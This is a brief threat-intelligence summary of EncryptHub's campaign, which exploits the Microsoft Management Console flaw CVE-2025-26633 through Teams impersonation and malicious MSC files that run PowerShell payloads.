EncryptHub is exploiting a security vulnerability in the Microsoft Management Console (CVE-2025-26633) to launch malicious payloads. This attack incorporates social engineering techniques, where the threat actor masquerades as IT personnel to send a Microsoft Teams request for remote connection. The campaign involves delivering two MSC files: one benign and one malicious, triggering the vulnerability upon execution. The malicious MSC file retrieves and runs an external PowerShell script to gather system data and ensure persistence, reporting back to EncryptHub’s command-and-control servers. Known for targeting individuals with fake job offers and compromised platforms, EncryptHub facilitates the theft of data through various methods.
EncryptHub uses a vulnerability in the Microsoft Management Console to deliver malicious payloads, leveraging social engineering to initiate infections through compromised MSC files.
The group's hybrid approach combines social engineering, exploiting known vulnerabilities, and deploying stealer malware to bypass security measures and gain control over target systems.
Recent attacks feature a deceitful Microsoft Teams request from a supposed IT department member, aiming to establish remote connections and launch additional PowerShell-enabled payloads.
EncryptHub's operation involves dropping benign and malicious MSC files to exploit the CVE-2025-26633 flaw, resulting in harmful execution upon launching the benign file.
Collection
[
|
...
]